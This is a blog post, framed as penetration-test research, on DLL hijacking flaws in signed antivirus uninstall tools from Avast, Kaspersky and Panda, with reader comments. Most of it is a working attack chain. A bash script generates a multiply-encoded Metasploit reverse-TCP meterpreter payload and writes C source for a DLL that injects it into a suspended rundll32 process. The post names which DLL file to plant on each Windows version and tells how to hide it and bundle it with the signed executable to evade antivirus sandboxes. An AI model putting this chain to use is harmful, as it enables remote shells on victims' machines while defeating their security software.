Dll hijacking reloaded

Well, this issue has been discussed many times already dating a few years back. A good description on this was originally published by HD Moore here : community.rapid7.com/community/metasploit/blog/2010/08/22/exploiting-dll-hijacking-flaws   There are many vulnerable applications out there, but in my recent research I wanted to check out how some security companies audit their software before release.  In a pentest scenario I wanted to use some digitally signed binary from some renounced AV vendor to load a custom crafted meterpreter Dll thus bypassing some sandboxing techniques. While some vendors proved to have good code, some to my surprise contain some Dll hijacking flaws (and digitally signed by the vendor) My testing scenario was a guest system running Windows 7 SP1 64bit in VirtualBox and a  Linux host with metasploit.  Lets see what the results were…

I have decided to have a close look at the Uninstall/Remove  utilities/tools  from various AV vendors. These files are always some signed single binaries or they are a self-extracting executable containing a few other files which are digitally signed. First one I chose to test was an Avast! Uninstall Utility (just Google it). It is a single executable file,digitally signed, designed to remove Avast products from Windows. It is called aswclear.exe signed01  Next I have checked the executable via Sysinternalssuite Procmon.exe to actually see what the file is doing, what Dlls is it loading etc.. And I have found an interesting part here :

library01The executable is trying to load a dll called UxTheme.dll first from its path, then it goes on to search for Windows Dll folders. So what if we use a specially crafted meterpreter dll, call it UxTheme.dll and put it alongside the executable ? It gets loaded by the aswclear.exe, but because we use a meterpreter dll the program just exits and on  the Linux listener box we get a reverse shell…

For Windows 8 and Windows 8.1 you can rename the meterpreter dll to shcore.dll (the executable searches for this library on Windows 8.x) 

For Windows XP SP3 the meterpreter dll should be called ntmarta.dll 

For the specially crafted Dll I have created a custom generator that creates a C source code for the meterpreter dll (the Metasploit generated Dll gets flagged by almost every AV that I know)

echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       By Astr0baby 2012                       Dll fun         " 
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What IP are we gonna use  ex.  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port 
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c" 
read enumber
./msfpayload windows/meterpreter/reverse_tcp_dns  LHOST=$IP LPORT=$port EXITFUNC=thread R |./msfencode -e  x86/shikata_ga_nai  -c 1 -t raw |  ./msfencode -e  x86/fnstenv_mov -c $enumber -t raw | ./msfencode -e  x86/shikata_ga_nai  -c $enumber -t raw | ./msfencode -e  x86/jmp_call_additive -c 1 -t raw | ./msfencode -e x86/alpha_mixed -b '\x00'  > test.c 

mkdir ShellCode/Dll 
mv test.c ShellCode/Dll 
cd ShellCode/Dll 

#We prepare the shellcode file to something usable using sed magic
sed -e 's/+/ /g' test.c > test2.c
sed -e 's/buf = //g' test2.c > final.c 
cat final.c >> clean.c

#Lets generate some files now 
#Generating template.h 
echo '#define SCSIZE 8196' > template.h
echo 'unsigned char function[SCSIZE] =' >> template.h 
cat clean.c >> template.h 
echo ';' >> template.h 

#Generating main template.c 
echo '#include <windows.h>' > template.c 
echo '#include "template.h"' >> template.c 
echo '#if BUILDMODE == 2' >> template.c 
echo 'void inline_bzero(void *p, size_t l)' >> template.c
echo '{' >> template.c
echo 'BYTE *q = (BYTE *)p;' >> template.c
echo 'size_t x = 0;' >> template.c
echo 'for (x = 0; x < l; x++)' >> template.c
echo '*(q++) = 0x00;' >> template.c
echo '}' >> template.c
echo '#endif' >> template.c
echo 'void ExecutePayload(void);' >> template.c
echo 'BOOL WINAPI' >> template.c
echo 'DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)' >> template.c
echo '{' >> template.c
echo 'switch (dwReason)' >> template.c
echo '{' >> template.c
echo 'case DLL_PROCESS_ATTACH:' >> template.c
echo ' ExecutePayload();' >> template.c
echo ' break;' >> template.c
echo 'case DLL_PROCESS_DETACH:' >> template.c
echo 'break;' >> template.c
echo 'case DLL_THREAD_ATTACH:' >> template.c
echo 'break;' >> template.c
echo ' case DLL_THREAD_DETACH:' >> template.c
echo 'break;' >> template.c
echo '}' >> template.c
echo 'return TRUE;' >> template.c
echo '}' >> template.c
echo 'void ExecutePayload(void) {' >> template.c
echo 'int error;' >> template.c
echo 'PROCESS_INFORMATION pi;' >> template.c
echo 'STARTUPINFO si;' >> template.c
echo 'CONTEXT ctx;' >> template.c
echo 'DWORD prot;' >> template.c
echo 'LPVOID ep;' >> template.c
echo 'inline_bzero( &si, sizeof( si ));' >> template.c
echo 'si.cb = sizeof(si);' >> template.c
echo 'if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {' >> template.c
echo ' ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;' >> template.c
echo 'GetThreadContext(pi.hThread, &ctx);' >> template.c
echo ' ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> template.c
echo 'WriteProcessMemory(pi.hProcess,(PVOID)ep, &function, SCSIZE, 0);' >> template.c
echo '#ifdef _WIN64' >> template.c
echo 'ctx.Rip = (DWORD64)ep;' >> template.c
echo '#else' >> template.c
echo 'ctx.Eip = (DWORD)ep;' >> template.c 
echo '#endif' >> template.c
echo 'SetThreadContext(pi.hThread,&ctx);' >> template.c
echo 'ResumeThread(pi.hThread);' >> template.c
echo 'CloseHandle(pi.hThread);' >> template.c
echo 'CloseHandle(pi.hProcess);' >> template.c
echo '}' >> template.c
echo 'ExitThread(0);' >> template.c 
echo '}' >> template.c 
todos <template.c> TEMPLATE.c
todos <template.h> TEMPLATE.h
#Generating build.bat
echo '@echo off' > build.bat
echo 'cl.exe template.c -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib' >> build.bat 
echo 'del *.def' >> build.bat
echo 'del *.h' >> build.bat
echo 'del *.rc' >> build.bat
echo 'del *.c' >> build.bat
echo 'del *.obj' >> build.bat 
todos <build.bat> BUILD.bat
rm template.c 
rm template.h
rm build.bat 
rm clean.c 
rm final.c 
rm test2.c 
rm test.c 
echo 'All files generated in ShellCode\Dll folder, please copy the Dll to WinBox with Visual Studio 2010 and run compile.bat' 
cd .. 
cd ..

This script generates 3 files in ShellCode/dll folder which can be compiled using Visual Studio C++ 2010/2012. So once we have the Dll and the aswclear.exe we can for example hide the meterpreter UxTheme.dll via attrib commands and pack it together with aswcler.exe in a zip. Simple attrib +h +s +r UxTheme.dll will hide the file from default explorer settings and cmd.exe dir commands…

folder02Some Sandbox technologies blindly trust Digitally signed executables and do not check what Dlls they load.

I have checked the following Vendor removal tools for Dll path flaws.

  • Kaspersky – kavremover.exe is flawed with exactly the same Dll problem like the above example
  • Panda – uninstaller.exe is a self extracting exe containing a few dlls and exes, one is flawed.
  • F-Secure – uitool UninstallationTool.exe – fine
  • AVG – AVG Remover – fine

Finally a short video for a little demonstration


Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

4 Responses to Dll hijacking reloaded

  1. no known technique to evade IDS / IPS??


  2. MaxPower says:

    Great post, lots of good information here.
    Helped my understanding, the more you know…

  3. n3k says:

    Hello , great site!, I really enjoy reading your posts.
    One question regarding this issue: Given that the DLL is placed on the user folder, you must already have administrator privilege in order to replace or write the malicious dll there, haven’t you?

    • astr0baby says:

      Hi, actually no you don’t need admin privileges to load the dll, the bug is that the affected executable searches for a shared dll in the users path first (where the executable is) in our example it is in a user controlled desktop. It can be (like it is shown in the video) included in a downloaded zip archive… In the article I was pointing out a fact that we can bypass some AV sandbox by fooling the AV with the legitimate signed executable that loads our evil dll instead.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s